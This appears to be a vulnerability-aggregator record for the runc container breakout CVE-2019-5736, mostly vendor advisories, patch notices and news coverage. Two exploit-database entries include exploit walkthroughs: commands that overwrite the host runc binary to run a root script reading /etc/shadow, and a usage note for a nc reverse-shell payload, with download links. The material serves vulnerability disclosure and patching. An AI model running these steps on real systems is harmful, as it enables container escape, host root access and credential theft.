Notes\r\n- This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the\r\npayload. It'll also overwrite `/bin/sh` inside the container.\r\n- Tested only on Debian 9.\r\n- No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec\r\n<id> /bin/sh` is issued on the host.\r\n\r\nMore complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46359"}], "zdt": [{"lastseen": "2019-02-25T07:57:31", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-15T00:00:00", "title": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-15T00:00:00", "id": "1337DAY-ID-32182", "href": "https://0day.today/exploit/description/32182", "sourceData": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)\r\n\r\n## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <[email\u00a0protected]>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32182"}, {"lastseen": "2019-02-25T08:13:22", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-12T00:00:00", "title": "runC < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "id": "1337DAY-ID-32165", "href": "https://0day.today/exploit/description/32165", "sourceData": "runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution\r\n\r\n# Usage\r\nEdit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container.\r\n\r\n# Notes\r\n- This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the\r\npayload. It'll also overwrite `/bin/sh` inside the container.\r\n- Tested only on Debian 9.\r\n- No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec\r\n<id> /bin/sh` is issued on the host.\r\n\r\nMore complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32165"}], "cisco": [{"lastseen": "2019-05-29T15:32:02", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "A vulnerability in the Open Container Initiative runc CLI tool used by multiple products could allow an unauthenticated, remote attacker to escalate privileges on a targeted system.\n\nThe vulnerability exists because the affected software improperly handles file descriptors related to /proc/self/exe. An attacker could exploit the vulnerability either by persuading a user to create a new container using an attacker-controlled image or by using the docker exec command to attach into an existing container that the attacker already has write access to. A successful exploit could allow the attacker to overwrite the host's runc binary file with a malicious file, escape the container, and execute arbitrary commands with root privileges on the host system.\n\nThis advisory will be updated as additional information becomes available.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc\"]", "modified": "2019-03-15T19:59:44", "published": "2019-02-15T17:00:00", "id": "CISCO-SA-20190215-RUNC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc", "type": "cisco", "title": "Container Privilege Escalation Vulnerability Affecting Cisco Products: February 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2019-02-12T09:21:48", "bulletinFamily": "info", "cvelist": ["CVE-2019-5736"], "description": "[](<https://1.bp.blogspot.com/-yPiZVO6M3og/XGKIqsgUb0I/AAAAAAAAzSY/gp4PJJU3-RA1YsD8NrTgc9r1AtbFt8ANQCLcBGAs/s728-e100/linux-container-runc-docker-hack.png>)\n\nA serious security vulnerability has been discovered in the core **runC **container code that affects several open-source container management systems, potentially allowing attackers to escape Linux container and obtain unauthorized, root-level access to the host operating system. \n \nThe vulnerability, identified as [CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>), was discovered by open source security researchers Adam Iwaniuk and Borys Pop\u0142awski and publicly [disclosed](<https://www.openwall.com/lists/oss-security/2019/02/11/2>) by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday. \n \nThe flaw resides in runC\u2014a lightweight low-level command-line tool for spawning and running containers, an operating-system-level virtualization method for running multiple isolated systems on a host using a single kernel. \n\n\n \nOriginally created by Docker, runC is the default container run-time for Docker, Kubernetes, ContainerD, CRI-O, and other container-dependent programs, and is widely being used by major cloud hosting and server providers. \n \n\n\n### runC Container Escape Vulnerability [CVE-2019-5736]\n\n \nThough researchers have not yet released full technical details of the flaw to give people time to patch, the Red Hat [advisory](<https://access.redhat.com/security/cve/cve-2019-5736>) says the \"flaw was found in the way runC handled system file descriptors when running containers.\" \n \nThus, a specially-crafted malicious container or an attacker having root access to a container could exploit this flaw (with minimal user interaction) to gain administrative privileges on the host machine running the container, eventually compromising the hundreds-to-thousands of other containers running on it. \n \nFor root access to the container, the attacker has to either: \n\n\n * create a new container using an attacker-controlled image, or\n * attach (docker exec) into an existing container which the attacker had previous write access to.\n\"A malicious container [then] could use this flaw to overwrite contents of the runC binary and consequently run arbitrary commands on the container host system,\" the advisory states. \n \n**How bad is this vulnerability?** \n \nScott McCarty, principal product manager for containers at Red Hat, [says](<https://www.redhat.com/en/blog/it-starts-linux-how-red-hat-helping-counter-linux-container-security-flaws>), \"While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that\u2019s exactly what this vulnerability represents.\" \n \n\n\n### runC Flaw: Security Patch Updates and Mitigation\n\n \nAccording to Red Hat, the vulnerability can be mitigated if SELinux in targeted enforcing mode is enabled, which is default on RedHat Enterprise Linux, CentOS, and Fedora. \n\n\n \nThe maintainers of runC have published a [git commit](<https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b>) to resolving the security flaw, but all the projects built atop runC need to incorporate the patches in their products. \n \n[Debian](<https://security-tracker.debian.org/tracker/CVE-2019-5736>) and [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-5736.html>) have also acknowledged that their Linux distributions are vulnerable to the reported vulnerability. The issue also affects container systems using [LXC](<https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d>), a Linux containerization tool that predates Docker, and [Apache Mesos](<https://mesos.apache.org/>) container code. \n \nMajor vendors and cloud service providers have already been pushing out security patches to address the issue, including [Google](<https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc>), [Amazon](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>), [Docker](<https://docs.docker.com/engine/release-notes/>), and [Kubernetes](<https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/>). \n \nRancher, the creator of the open-source Kubernetes management software, has also published a [patching script](<https://github.com/rancher/runc-cve>) for legacy versions of Docker. \n \nIf you are running any kind of containers, consider yourself vulnerable and upgrade to an image with a fixed version of runC as soon as it is available to prevent cyber attacks.\n", "modified": "2019-02-12T09:17:09", "published": "2019-02-12T08:59:00", "id": "THN:B0FC327500C590C565FC4F46D8DCDD34", "href": "https://thehackernews.com/2019/02/linux-container-runc-docker.html", "type": "thn", "title": "RunC Flaw Lets Attackers Escape Linux Containers to Gain Root on Hosts", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n \n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to these updated packages.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-26T14:32:43", "published": "2019-02-26T14:31:21", "id": "RHSA-2019:0408", "href": "https://access.redhat.com/errata/RHSA-2019:0408", "type": "redhat", "title": "(RHSA-2019:0408) Important: OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open-source engine that automates the deployment of any application as a lightweight, portable, self-sufficient container that runs virtually anywhere.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information, can be found in the vulnerability article linked from the Reference section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-11T19:28:04", "published": "2019-02-11T19:26:20", "id": "RHSA-2019:0304", "href": "https://access.redhat.com/errata/RHSA-2019:0304", "type": "redhat", "title": "(RHSA-2019:0304) Important: docker security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T10:21:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via `systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services (BZ#1695689)", "modified": "2019-05-07T08:05:58", "published": "2019-05-07T07:39:11", "id": "RHSA-2019:0975", "href": "https://access.redhat.com/errata/RHSA-2019:0975", "type": "redhat", "title": "(RHSA-2019:0975) Important: container-tools:rhel8 security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Red Hat Container Development Kit is a platform for developing containerized applications; a set of tools that enables developers to quickly and easily set up an environment for developing and testing containerized applications on the Red Hat Enterprise Linux platform.\n\nThis update, Container Development Kit 3.7.0-1, includes an updated Red Hat Enterprise Linux ISO that contains fixes for the following security issues.\n\nSecurity Fix(es):\n\n* runc: Execution of malicious containers allows for container escape and access to host filesystem (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-26T03:38:34", "published": "2019-02-26T03:38:15", "id": "RHSA-2019:0401", "href": "https://access.redhat.com/errata/RHSA-2019:0401", "type": "redhat", "title": "(RHSA-2019:0401) Important: Container Development Kit 3.7.0-1 security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information, can be found in the vulnerability article linked from the Reference section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-11T19:27:28", "published": "2019-02-11T19:24:53", "id": "RHSA-2019:0303", "href": "https://access.redhat.com/errata/RHSA-2019:0303", "type": "redhat", "title": "(RHSA-2019:0303) Important: runc security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:18", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "\n", "edition": 6, "modified": "2019-02-22T00:00:00", "published": "2019-02-15T00:00:00", "id": "VMSA-2019-0001", "href": "https://www.vmware.com/security/advisories/VMSA-2019-0001.html", "title": "VMware product updates resolve mishandled file descriptor vulnerability in runc container runtime.", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:07", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. The patch applies to all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5.\n**Vulnerability id:** PSBM-91042\nIt was discovered that a malicious user logged in to a Virtuozzo container could potentially overwrite the 'vzctl' binary on the host. The attacker could replace executables in that container with symlinks to '/proc/self/exe'. After that, 'vzctl exec' called from the host to run one of such executables would try to run the host's 'vzctl' there instead. If the attacker managed to intercept that, they would be able to change the contents of the host's 'vzctl' binary. The issue is similar to CVE-2019-5736, but affects 'vzctl' rather than 'runc'.\n\n", "edition": 1, "modified": "2019-02-12T00:00:00", "published": "2019-02-12T00:00:00", "id": "VZA-2019-008", "href": "https://help.virtuozzo.com/s/article/VZA-2019-008", "title": "Important kernel security update: Virtuozzo ReadyKernel patch 72.0 for all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5", "type": "virtuozzo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-02-20T09:45:54", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "Despite the huge advantages that containers offer in application portability, acceleration of CI/CD pipelines and agility of deployment environments, the biggest concern has always been about isolation. Since all the containers running on a host share the same underlying kernel, any malicious code breaking out of a container can compromise the entire host, and hence all the applications running on the host and potentially in the cluster.\n\nThat fear of container isolation failing to hold up turned out to be true yesterday when a vulnerability in runC was announced. runC is the key and most popular software component that most container engines rely on for spinning up containers on a host. The announced vulnerability allows an attacker to break out of the container isolation through a well-crafted attack (technical details of the vulnerability and the exploit are at _<https://seclists.org/oss-sec/2019/q1/119>_) and compromise the entire host. The vulnerability is particularly nasty because it is not covered by the default AppArmor or SELinux kernel-enforced sandboxing policies.\n\n### What can you do to protect your containerized applications?\n\nEven though the exploit is tricky to execute, the exploit code will be released publicly on **February 18**, so it\u2019s best to protect your container environment by doing the following:\n\n 1. Know which nodes (Docker hosts) you are running the containers, and if you are running a vulnerable version of Docker Engine. If you are a Qualys customer, you can use AssetView to get that information. Docker has released the patch in version 18.09.2. \n\n\n 2. Upgrade your Docker hosts to version 18.09.2.\n 3. For hosts managed by public cloud service providers, please keep a close watch on how they are addressing the issue. \nGCP - <https://cloud.google.com/kubernetes-engine/docs/security-bulletins> \nAWS - <https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>\n 4. Qualys is working on releasing the following detections (QIDs), and more vendor-specific QIDs will be launched in the coming days. \n\n** 237121 **: Red Hat Update for docker (RHSA-2019:0304) \n** 237120 **: Red Hat Update for runc (RHSA-2019:0303) \n** 351500 **: Amazon Linux Security Advisory for docker: ALAS-2019-1156 \n** 371641 **: Runc Container Breakout Vulnerability\n\nYou can get more details at [Qualys Threat Protection](<https://threatprotect.qualys.com/2019/02/11/runc-container-escape-vulnerability-cve-2019-5736/>).\n\n### What to do in the future?\n\nIt\u2019s good to be concerned about any new technology while it matures, but it\u2019s equally important to harden the application build and deployment workflows in order to prevent the attacker from getting an easy lead into exploiting the deployed containers.\n\n 1. Ensure that only those container images that have gone through the defined compliance checks (related to vulnerabilities, packages, etc.) are deployed in production. As an example, you can use the Qualys Container Security solution to promote only those built images that pass the compliance checks on the build nodes. \n\n\n 2. Privileged containers, if compromised, can bring down the entire container cluster. Hence, keep a close watch on all privileged containers running in your environment. \n\n\n\n(Asif Awan is CTO for Container Security at Qualys)", "modified": "2019-02-12T15:46:10", "published": "2019-02-12T15:46:10", "id": "QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465", "href": "https://blog.qualys.com/securitylabs/2019/02/12/runc-container-breakout-vulnerability", "type": "qualysblog", "title": "RunC Container Breakout Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Arch Linux Security Advisory ASA-201902-6\n=========================================\n\nSeverity: High\nDate : 2019-02-11\nCVE-ID : CVE-2019-5736\nPackage : runc\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-878\n\nSummary\n=======\n\nThe package runc before version 1.0.0rc6-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 1.0.0rc6-1.\n\n# pacman -Syu \"runc>=1.0.0rc6-1\"\n\nThe problem has been fixed upstream in version 1.0.0rc6.\n\nWorkaround\n==========\n\nDon't run privileged containers.\n\nDescription\n===========\n\nA vulnerability discovered in runc through 1.0-rc6, as used in Docker\nbefore 18.09.2 and other products, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by\nleveraging the ability to execute a command as root within one of these\ntypes of containers: (1) a new container with an attacker-controlled\nimage, or (2) an existing container, to which the attacker previously\nhad write access, that can be attached with docker exec. This occurs\nbecause of file-descriptor mishandling, related to /proc/self/exe.\n\nImpact\n======\n\nA malicious container can escalate privileges to gain access as root on\nthe host system and execute arbitrary code.\n\nReferences\n==========\n\nhttps://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nhttps://www.openwall.com/lists/oss-security/2019/02/11/2\nhttps://security.archlinux.org/CVE-2019-5736", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "ASA-201902-6", "href": "https://security.archlinux.org/ASA-201902-6", "type": "archlinux", "title": "[ASA-201902-6] runc: privilege escalation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Arch Linux Security Advisory ASA-201902-20\n==========================================\n\nSeverity: High\nDate : 2019-02-17\nCVE-ID : CVE-2019-5736\nPackage : flatpak\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-880\n\nSummary\n=======\n\nThe package flatpak before version 1.2.3-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 1.2.3-1.\n\n# pacman -Syu \"flatpak>=1.2.3-1\"\n\nThe problem has been fixed upstream in version 1.2.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA vulnerability discovered in runc through 1.0-rc6, as used in Docker\nbefore 18.09.2 and other products, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by\nleveraging the ability to execute a command as root within one of these\ntypes of containers: (1) a new container with an attacker-controlled\nimage, or (2) an existing container, to which the attacker previously\nhad write access, that can be attached with docker exec. This occurs\nbecause of file-descriptor mishandling, related to /proc/self/exe.\n\nImpact\n======\n\nA malicious container can escalate privileges to gain access as root on\nthe host system and execute arbitrary code.\n\nReferences\n==========\n\nhttps://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nhttps://www.openwall.com/lists/oss-security/2019/02/11/2\nhttps://security.archlinux.org/CVE-2019-5736", "modified": "2019-02-17T00:00:00", "published": "2019-02-17T00:00:00", "id": "ASA-201902-20", "href": "https://security.archlinux.org/ASA-201902-20", "type": "archlinux", "title": "[ASA-201902-20] flatpak: privilege escalation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-30T19:25:00", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "container-selinux\n[2:2.94-1.git1e99f1d]\n- Resolves: #1690286 - bump to v2.94\n- Resolves: #1693806, #1689255\n[2:2.89-1.git2521d0d]\n- bump to v2.89\nrunc\n[1.0.0-55.rc5.dev.git2abd837]\n- Resolves: CVE-2019-5736", "edition": 2, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-0975", "href": "http://linux.oracle.com/errata/ELSA-2019-0975.html", "title": "container-tools:rhel8 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "**Issue Overview:**\n\nA vulnerability was discovered in runc, which is used by Docker to run containers. runc did not prevent container processes from modifying the runc binary via /proc/self/exe. A malicious container could replace the runc binary, resulting in container escape and privilege escalation. This was fixed by creating a per-container copy of runc.([CVE-2019-5736 __](<https://access.redhat.com/security/cve/CVE-2019-5736>))\n\n \n**Affected Packages:** \n\n\ndocker\n\n \n**Issue Correction:** \nRun _yum update docker_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n docker-18.06.1ce-7.25.amzn1.src \n \n x86_64: \n docker-debuginfo-18.06.1ce-7.25.amzn1.x86_64 \n docker-18.06.1ce-7.25.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2019-02-08T22:28:00", "published": "2019-02-08T22:28:00", "id": "ALAS-2019-1156", "href": "https://alas.aws.amazon.com/ALAS-2019-1156.html", "title": "Important: docker", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-11-03T07:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-5736"], "description": "runc, a building-block project for the container technologies used by many enterprises as well as public cloud providers, has patched a vulnerability that would allow root-level code-execution, container escape and access to the host filesystem.\n\nDiscovered by researchers Adam Iwaniuk and Borys Pop\u0142awski, the vulnerability (CVE-2019-5736) \u201callows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host,\u201d according a [posting on Monday](<https://www.openwall.com/lists/oss-security/2019/02/11/2>).\n\nAn attacker with local access to the affected system can exploit the flaw by convincing users to run malicious or modified containers on their systems. One of runc\u2019s administrators, Aleksa Sarai, who is also a senior software engineer at SUSE Linux GmbH, explained in the posting that an attacker could create a new container using an attacker-controlled software image, or could add any container command (i.e., the \u201cdocker exec\u201d command line in Docker) into an existing container that he or she has write access to; from there, the attacker needs only to convince a user to run the weaponized container within their environment, via various social engineering tactics.\n\n\u201cThis vulnerability overwrites the `runc` binary which is a CLI tool used for starting and running containers,\u201d Ali Golshan, CTO and co-founder at StackRox, explained to Threatpost. \u201cThis method allows the attacker to have root access to the environment, with the eventual goal of exploiting things like zero-day vulnerabilities to enable code-execution. This could allow an attacker to run new containers, exhaust resources or gain access to existing containers.\u201d\n\n## Impact\n\nrunc is the open-source underlying container runtime that powers popular container technologies like Docker, cri-o, containerd and Kubernetes. The vulnerable surface is thus potentially vast: Containers allow applications to be more agile and on-demand, and as such have become a de facto standard for architecting cloud services, embraced by enterprises worldwide as well as [Amazon Web Services](<https://aws.amazon.com/containers/>), [Microsoft Azure](<https://azure.microsoft.com/en-us/overview/containers/>) and other cloud providers.\n\nScott McCarty, principal product manager for containers at Red Hat, noted that the flaw represents \u201ca bad scenario for many IT administrators, managers and CxOs,\u201d because of the interconnectedness of container-based cloud infrastructure.\n\n\u201cContainers represent a move back toward shared systems where applications from many different users all run on the same Linux host,\u201d he said in a [Monday blog](<https://www.redhat.com/en/blog/it-starts-linux-how-red-hat-helping-counter-linux-container-security-flaws>). \u201cExploiting this vulnerability means that malicious code could potentially break containment, impacting not just a single container, but the entire container host, ultimately compromising the hundreds-to-thousands of other containers running on it. A cascading set of exploits affecting a wide range of interconnected production systems qualifies as a difficult scenario for any IT organization and that\u2019s exactly what this vulnerability represents.\u201d\n\nGolshan told Threatpost, \u201cwhile this is a vulnerability there are comments within the release that \u2018correct use of user namespaces can prevent this; where the host root is not mapped into the container\u2019s user namespace.\u2019 This is a good example of how attack surface can move to the container and orchestrator ecosystem due to a more immature security posture.\u201d\n\n## Who\u2019s Affected and Patch Availability\n\nBy default, Red Hat products are protected by SELinux in enforcing mode; but the vulnerability is not blocked by the default AppArmor policy, nor by the default SELinux policy in the \u201cmoby-engine\u201d package on Fedora (Fedora\u2019s \u201cdocker\u201d package as well as podman are protected, however).\n\nRelated container projects like Apache Mesos and LXC have similar vulnerabilities, according to Sarai; the latter has also patched the issue. But the systemd-nspawn project isn\u2019t vulnerable because its method of attaching to a container uses a different method to LXC and runc, Sarai said.\n\n\u201cIt is quite likely that most container runtimes are vulnerable to this flaw, unless they took very strange mitigations beforehand,\u201d said the researcher.\n\nAWS has also issued a [security bulletin](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>) and patches for its platforms that use runc.\n\nThe flaw carries a CVSS severity rating of 7.2.\n\n## Container Security in the Spotlight\n\nContainer security has been an increasing topic of late; in January for instance, [researchers said](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>) they hacked the Docker test platform called Play-with-Docker, allowing them to access data and manipulate any test Docker containers running on the host system.\n\nLast year, several malicious Docker images (17 in total) [were pulled down from the Docker Hub image repository](<https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/>). Researchers couldn\u2019t say for sure how many times 